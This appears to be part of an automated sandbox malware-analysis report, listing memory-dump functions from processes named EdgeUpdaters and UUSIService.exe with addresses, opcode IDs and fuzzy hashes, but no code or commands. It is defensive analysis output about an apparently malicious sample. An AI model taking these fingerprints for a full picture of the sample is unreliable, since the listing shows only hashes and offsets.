Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f99fb997c364dc197e12869554566a0cc16e09caacfa00e75532dc210f81611e
Instruction ID: e24d33bedb05e41d670d2f72b3ce617b51ba81790d6105b7f10a65d4c727ff8c
Opcode Fuzzy Hash: f99fb997c364dc197e12869554566a0cc16e09caacfa00e75532dc210f81611e
Instruction Fuzzy Hash: 98014C32D1464A9BCB019BB9DC104DDBB72EFCA310F1587A7D121B75A0EB74258AC7A1

Function 00F50CC0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5832a56bc225d771e7e109693000b8933650044974bc08e5d679dfd3dbd8df5
Instruction ID: abffaa2d9c12d688224a9c5a483cb47a177970a521a37f99ca5b29f71f5c7cfd
Opcode Fuzzy Hash: a5832a56bc225d771e7e109693000b8933650044974bc08e5d679dfd3dbd8df5
Instruction Fuzzy Hash: EB01B132D0464A9BCF01DBB9D8404DDFBB2AFDA310F258756D121775A0EB70258ECBA1

Function 00C6D049 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3377292507.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c6d000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f106db1de6d32a73fa54176f8611114f3daf1afd33b24f9a01c5dbf81dc6a3
Instruction ID: 8df022e01540d35ccb1e5cfc94153636f352ecae8a22312ee50a4698c25880b8
Opcode Fuzzy Hash: 56f106db1de6d32a73fa54176f8611114f3daf1afd33b24f9a01c5dbf81dc6a3
Instruction Fuzzy Hash: A0012B71A04344DAE7305A26DCC0767FF9CDF85320F18C55AED0A4F282C279D986C6B2

Function 00F50998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c582ced9ad09eb9626db5c2e58514abd77a0523e560142272d6827e007d2e93
Instruction ID: 448d6a6de7ff151b6fa1da644b0ee3469d611ecc0501ec3c50b2bebe9801c6ff
Opcode Fuzzy Hash: 5c582ced9ad09eb9626db5c2e58514abd77a0523e560142272d6827e007d2e93
Instruction Fuzzy Hash: 8E111878600107CFDF15FF68E998A6CBBB1FB55300B104668D509972A8EB74A987CF80

Function 00F50CD0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9268048649853ae39eb1a272363461ae8d7ea147e7fa4aaa5a81ccdbbe8b84
Instruction ID: bea7cac10b8249f4152285e392f5ddfbaa88961e9d915d90fdba95db65bc03ea
Opcode Fuzzy Hash: 3d9268048649853ae39eb1a272363461ae8d7ea147e7fa4aaa5a81ccdbbe8b84
Instruction Fuzzy Hash: 84014B32D1060E9BCF00DBBAD8004DEF7B6EFC9310F218766D21577560EB70258A8BA0

Function 00F50D48 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf2449f4a927452e14198c0273c3018494c19588e6b01e040134490e35b6502
Instruction ID: 0f239b93b714edc68e455d53175ba01de3721d52852fb67be6aa464e3e1dccd2
Opcode Fuzzy Hash: daf2449f4a927452e14198c0273c3018494c19588e6b01e040134490e35b6502
Instruction Fuzzy Hash: 21F04C32E1124A8FDB049BB0C860AEFBFB15F84320F044A26C532BB3C1DE70550A8792

Function 00F50901 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 339eab90be0962de7c7023584378380912607e3bd383415a42eef94f42f87913
Instruction ID: 336416b4e4346269892149bc4dd1822085d645220ba8a1cb625d71ce8b0d89d8
Opcode Fuzzy Hash: 339eab90be0962de7c7023584378380912607e3bd383415a42eef94f42f87913
Instruction Fuzzy Hash: A9F0C872D141499BDB15DB74C865AEFBFB14F84310F154A2AD512B72C1DE70590AC7C2

Function 00C6D048 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3377292507.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c6d000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a416a3c276753c83c0c52ebe91951cd562cb8ef568c57071ae2d06a11713af
Instruction ID: 202d514affae7b297ff6514e22c70ae1b6a61ddefd5aee21838d834c1fef1c88
Opcode Fuzzy Hash: 89a416a3c276753c83c0c52ebe91951cd562cb8ef568c57071ae2d06a11713af
Instruction Fuzzy Hash: 22F0C2715043449AE7208A16D8C4B62FF98EF94734F18C45AED094B286C2799945CAB1

Function 00F50910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f5c49d4365faf2771b33485ee66b5035781e2697d5fc8deeba36d34de7a16f
Instruction ID: f6fb2cb35796e93df311d94865ca004de63df42acfe8d2f84dca16fd2c660480
Opcode Fuzzy Hash: 78f5c49d4365faf2771b33485ee66b5035781e2697d5fc8deeba36d34de7a16f
Instruction Fuzzy Hash: E6F0AE72E1014AD7DF05DB64C955AEFBFB69F84300F154525D602B7380DE70590AD7D2

Function 00F5083F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d4a7ae2feccee4dc86bb44e093f6c79d456a4eb81d23feebe1cd152640711c
Instruction ID: da877b838ce3d1ed33fc967cd037413b0e5380d0d9c351da9950bbde5d3eed44
Opcode Fuzzy Hash: 33d4a7ae2feccee4dc86bb44e093f6c79d456a4eb81d23feebe1cd152640711c
Instruction Fuzzy Hash: 64E04FB2844345AFDB41DBB4841465C7BA0AB00261F5506DBD498D7691DA318A658791

Function 00F50848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3378274906.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f50000_EdgeUpdaters.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d15fc9a6bdf0a0cf22ce255421462bb544446b33492ec55cd4f9691754911b7f
Instruction ID: 14a7d5c2e37a6618fd4da7d887f8afac49e060a880f333cd531d0168aca715a9
Opcode Fuzzy Hash: d15fc9a6bdf0a0cf22ce255421462bb544446b33492ec55cd4f9691754911b7f
Instruction Fuzzy Hash: 2ED017B2D05209EFDB11CFA4C805B5D7BB8FB05281F6504D6E848DB641DA329E50D791

Analysis Process: UUSIService.exePID: 7132, Parent PID: 4004COMMON

Executed Functions

Function 01260DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d3cf47a6e3c8aee398f237b8807b2efff89d2fe5fb0d01f57031e19e4d40c4
Instruction ID: dca4f3a0f8eec7cf496c48ae67ed95ad6acfc919953be3b8f0348fb5c828b9bb
Opcode Fuzzy Hash: 06d3cf47a6e3c8aee398f237b8807b2efff89d2fe5fb0d01f57031e19e4d40c4
Instruction Fuzzy Hash: 46F10675A002498FDB15CFA8C484ADCBBF6FF89320F198195E545AB3A6D731AD81CF60

Function 01261509 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f769582087aa6fb22abdb3eeae28535d73ef14aafab7609a3aabd372a53d0784
Instruction ID: ea53bcf5819463c71364a4858065e563666915ed5c815d8c092cc955ffffe32e
Opcode Fuzzy Hash: f769582087aa6fb22abdb3eeae28535d73ef14aafab7609a3aabd372a53d0784
Instruction Fuzzy Hash: 89F059322043419FC70AA778A8509AA7BA3FFC164070085AEE0198B384DF25AC06C7C5

Function 01260B28 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed0a3b0e02098e6f2af9acb9c4f1848210521bbc744efc2bbcdb27859c46f84
Instruction ID: 5f84b2b15061b09fa94c0cf9433be4686c9262222ea181b58ee043dcec684e16
Opcode Fuzzy Hash: 9ed0a3b0e02098e6f2af9acb9c4f1848210521bbc744efc2bbcdb27859c46f84
Instruction Fuzzy Hash: A941D171A11755CFDB26CF28D840A9EBBF6FF89300B14466AE496EB295D730A884CF50

Function 01260A60 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4fe9bc1b048318bf30beae3245c4dbf234bfba3656aaa1319af19fc6d5114e
Instruction ID: 8f342bbd42453a7f85625148a1a96f1f514e049d7c4a5143d8cf712c02b1c7e3
Opcode Fuzzy Hash: 9b4fe9bc1b048318bf30beae3245c4dbf234bfba3656aaa1319af19fc6d5114e
Instruction Fuzzy Hash: 052147353104018FC748EB79D458A2D3BE2FFCDA14B6644A9E406CB376DA72DC018B51

Function 01260A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aef5923860ec4d2c8ee789a3b353c1428f9d6cc896158c97ba4ad347907c19c
Instruction ID: 3c08e88c585df1adf4b2692f37f5f1b081bb64c51a27a25abd4fefb23082b008
Opcode Fuzzy Hash: 4aef5923860ec4d2c8ee789a3b353c1428f9d6cc896158c97ba4ad347907c19c
Instruction Fuzzy Hash: 991116353104118FC748EB79E498A2E7BE6FFCDA14B6540A8E50ACB376DE71EC018B91

Function 01260E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7111fc9e550be774c9fe6a37c84441759f15f3d670d3dd2a1592fd58eae79728
Instruction ID: aa4509544de0fcde1e6abc9caa70322301a2f8de7b5bc001230bec1a3f7db9e0
Opcode Fuzzy Hash: 7111fc9e550be774c9fe6a37c84441759f15f3d670d3dd2a1592fd58eae79728
Instruction Fuzzy Hash: C221BE35A012098FDB05CFA8D4809DCBBF6FF89220F1990A5E905AB366D731AD80CF60

Function 01260CC0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b58fb790e1cdb595c13df22025c894fab77ebe8604863854602b597f01339c21
Instruction ID: e5a5d36c30f8ca9dd5b4403b7845f86dbfb094b3bab653a13e17133348bb35c0
Opcode Fuzzy Hash: b58fb790e1cdb595c13df22025c894fab77ebe8604863854602b597f01339c21
Instruction Fuzzy Hash: 96118B72D0070EABCB01CFB9D8404DDFBB1EF99320F228666E111B7250E770258ACB61

Function 01260989 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15122e4d4ba158bca669226ca86b1bf98be50429ffdc46c10ef07a219f0ee87e
Instruction ID: 0e13b4dcc7fe1ef9d16086f1811ae6d1f2d8eed7121fa315db449d7b86eee6df
Opcode Fuzzy Hash: 15122e4d4ba158bca669226ca86b1bf98be50429ffdc46c10ef07a219f0ee87e
Instruction Fuzzy Hash: 6B11283A911506DFCB0AEF78EA9495CBBB2FB44301B504BA9D401D7728EB309A46CF80

Function 01260879 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 485063c42e474b968dab025f3ba56b323850630fb0b8fceb55c8557888b178c3
Instruction ID: f0b468d118864c9ddde5f73970032b3c9cb354ada3e2062251d0c39df119a937
Opcode Fuzzy Hash: 485063c42e474b968dab025f3ba56b323850630fb0b8fceb55c8557888b178c3
Instruction Fuzzy Hash: FE019E32D1460A9BCB008BB9DC004DDBBB2EFCA310F1587A6D111B7560E774258ECBA1

Function 011CD1C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276218312.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11cd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92fcbd2a274e9674c508870556e550b469e68de7894c2a4762577df79bb9f7d
Instruction ID: b3a73d154d6859071baaf2320c7854df58d3572d56cfb0ccfbb4cb12ffffbf8b
Opcode Fuzzy Hash: e92fcbd2a274e9674c508870556e550b469e68de7894c2a4762577df79bb9f7d
Instruction Fuzzy Hash: 0301FC310043449AEB294A99E984767BF98EF51A34F14C46EED080A142C339D441C6B2

Function 01260CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c12bc1591e5a6e9a31b4aae3b2cb58b6cca33eed4a73b6a36c7907ce1fbf3ec
Instruction ID: 0f72b5aa617ad604e7b4975c4dd8f495b5d9b61912200b34499a8e5f776a3d5e
Opcode Fuzzy Hash: 6c12bc1591e5a6e9a31b4aae3b2cb58b6cca33eed4a73b6a36c7907ce1fbf3ec
Instruction Fuzzy Hash: D0015E32D0060EABCB00DFBAD8404DDFBB5EF89320F218766E11177650E770258ACB60

Function 01260998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2abfa3eb6ac54bb871d477dd6f6b15dd1ad5b2ebdd388d55eca37f53a413a9
Instruction ID: cce1f1734ea014c2ac854095d896e64d88849f62ae16d322ed00b35bb33d3d54
Opcode Fuzzy Hash: 6e2abfa3eb6ac54bb871d477dd6f6b15dd1ad5b2ebdd388d55eca37f53a413a9
Instruction Fuzzy Hash: 5411183A901506DFCB09FF78EA9894CBBB2FB44301B504768D50187728EB30A946CF80

Function 01260901 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f880902c644494c98b46421f5ab00f802b625d9e344fe39bc5a309ebfa9b560
Instruction ID: e466cb2709ecf1249e55e8f1d3de38ba7a5c243674d3febe3549d3eab34425fb
Opcode Fuzzy Hash: 2f880902c644494c98b46421f5ab00f802b625d9e344fe39bc5a309ebfa9b560
Instruction Fuzzy Hash: EDF0C272D212098BDB48DF64C4559EFBBF69F84310F15893AD442B7280DEB0A9068B82

Function 011CD1C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276218312.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11cd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee9ffeca52bee1657937915b8db74b57c714c64af68f06795f70d5890b2a007
Instruction ID: a0af887ed4fb3a21ac7c18b8ac877d077965bd7d344293dd400b37ba0ef2e33c
Opcode Fuzzy Hash: cee9ffeca52bee1657937915b8db74b57c714c64af68f06795f70d5890b2a007
Instruction Fuzzy Hash: 69F0C271404344AAEB148E59E8C4B62FF98EB50A34F18C05EED080F282C379A844CAB1

Function 01260D51 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8e5df947c899273dbef4d42609b07b904f1904f7efeacddb0f82b0576118f8
Instruction ID: d6dcddae9b321d577bd744e49bc56023aae127540bd22a9c384be186bde8a253
Opcode Fuzzy Hash: ab8e5df947c899273dbef4d42609b07b904f1904f7efeacddb0f82b0576118f8
Instruction Fuzzy Hash: DBF0C272921209DBDF18DF74C455AEFBBB59F84310F04862AD112A7280EEB16946CB82

Function 01260910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5f657625b9407a3aa5ab1fdb9653abd90927ea066a23b88b666ea7e088041ab
Instruction ID: 663b9ee2d63d496f306565030526546d4e0d5d9557c75419ef6df1a443c81f8a
Opcode Fuzzy Hash: d5f657625b9407a3aa5ab1fdb9653abd90927ea066a23b88b666ea7e088041ab
Instruction Fuzzy Hash: 04F0E932A2114997DF04DB64C855AEFBBBA9F84700F044925D512B7380DEB0690687C5

Function 01261798 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e147805cd7b2ced0e5d13acca1d790497d1747de8185a845e3f9dfa39ac7fd1
Instruction ID: b04d22d19327d3520a7049c21c9f2d910ce2b26c4ea83fb8fda1b15b8b07828f
Opcode Fuzzy Hash: 5e147805cd7b2ced0e5d13acca1d790497d1747de8185a845e3f9dfa39ac7fd1
Instruction Fuzzy Hash: D6D02B3131031647CF29A6B8680057A33DD8FC4255700047EE20DC7380D936D88083C4

Function 01260838 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32925e7c1f000572b0c30997248db36af249bcde22677ec6c50657040e6cb903
Instruction ID: b5ae4484da3b73346eb49f2ab76dfd10b7af01ce87152dde3964352c88b95b1a
Opcode Fuzzy Hash: 32925e7c1f000572b0c30997248db36af249bcde22677ec6c50657040e6cb903
Instruction Fuzzy Hash: F1E04F72C55304DFDB51CFB8C0807EC7BB4EB55380F5105AAE488D7642D6329E91CB40

Function 01260848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b06854c7bcc9d0c347b1d5a1be2db006258340885116267e0bf81a430afafe34
Instruction ID: 022c6bd61e376226e26a080c53363537764811bec10a46cb79a9a39f0950b385
Opcode Fuzzy Hash: b06854c7bcc9d0c347b1d5a1be2db006258340885116267e0bf81a430afafe34
Instruction Fuzzy Hash: 17D01772906209EFEB11CFA8C40575D7BB8AB05280F650496E488C7645DA319E90D795

Function 01261791 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2276399081.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4651fe400f8434078fa374acff38366598f640e29e26e0b7edaf99ea1b70a10
Instruction ID: 58edc035b1cbb338d33c385fcf620a188111e8d0a463e1e0e713760eeb96df7c
Opcode Fuzzy Hash: d4651fe400f8434078fa374acff38366598f640e29e26e0b7edaf99ea1b70a10
Instruction Fuzzy Hash: EED02231AA03204FCBAD457824000F933ECAAD036470046BFD405D16A2D22A98028A80

Analysis Process: UUSIService.exePID: 7104, Parent PID: 4004COMMON

Executed Functions

Function 022A0DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69877c67ba95991f15b0f2216962ee19269f2cef1a5bfd23356fb91f6ed43f90
Instruction ID: e06335d6c24d7ea4b4b9c451cf8b7cfe5343c529a69fa04f148499e82d10780d
Opcode Fuzzy Hash: 69877c67ba95991f15b0f2216962ee19269f2cef1a5bfd23356fb91f6ed43f90
Instruction Fuzzy Hash: 01F1F335A002498FDB15DFA8C494ADCBBF2BF49320F189195E845BB366DB31AD85CF60

Function 022A1509 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf8a76f0f51457030e938efb7874852cc4fd23b374f399c0592a7518d8e13f4
Instruction ID: 235cf0dddbc1dd8eb8f996b2b8bfcc8159fbcb45257e74fe7ff1a556786cf4dc
Opcode Fuzzy Hash: 6cf8a76f0f51457030e938efb7874852cc4fd23b374f399c0592a7518d8e13f4
Instruction Fuzzy Hash: A1F024312042409FCB02A778A9116ABBFB2EFC135070445BEE0198F646DF20AD46C7D4

Function 022A0B28 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8370006fbe2a83de4ca9602d7f703ed02865031bde757e2e3e06e5c8cda376
Instruction ID: 609de2201affe27095a4ebb9521e7f75d51545237ec6b5729281a7a8a772293a
Opcode Fuzzy Hash: 2b8370006fbe2a83de4ca9602d7f703ed02865031bde757e2e3e06e5c8cda376
Instruction Fuzzy Hash: 8041F270A14741CFDB26CF68D810A9EBBF2BF89300F044A6AD486EB6A5C734A945CF10

Function 022A0A60 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d21854ca390ba3d7f37e6cac34d4ba594c74313891dbf99fa15248b6ae6b414
Instruction ID: e48d63ab0f8d695b8617336acde8ccbcfea79d659cad3cd3a58176d26c92fc8a
Opcode Fuzzy Hash: 1d21854ca390ba3d7f37e6cac34d4ba594c74313891dbf99fa15248b6ae6b414
Instruction Fuzzy Hash: DA2147343004008FC748EB39D898E6D3BE2FFCD610B6540A9E40ACB372CA61DC068B51

Function 022A0A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af7803855bca7ab2fa3ff6a2a4da7967e14279b0fea31395bcc20ff1011330a
Instruction ID: e48eed8c0162c9ed604a4eec5bfe324ce60c717822c84c914c1e9528d33612ff
Opcode Fuzzy Hash: 5af7803855bca7ab2fa3ff6a2a4da7967e14279b0fea31395bcc20ff1011330a
Instruction Fuzzy Hash: A411F6343104118FC748EB29D998A1D7BE6FFCDA1076540A8E50ACB376DE61EC028B91

Function 022A0E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388c523046527710c6a30976f6558ab2325e858935784763f181c8b757d11e2a
Instruction ID: f9ce737de4679cb2d27403ef2266a94bcd908edecef5c3992ec6bc48b9c620cf
Opcode Fuzzy Hash: 388c523046527710c6a30976f6558ab2325e858935784763f181c8b757d11e2a
Instruction Fuzzy Hash: 88219F35A012498FDB15CF98D494ADCBBF2FF89320F1890A5E905BB265D731AD85CF60

Function 022A0CC0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
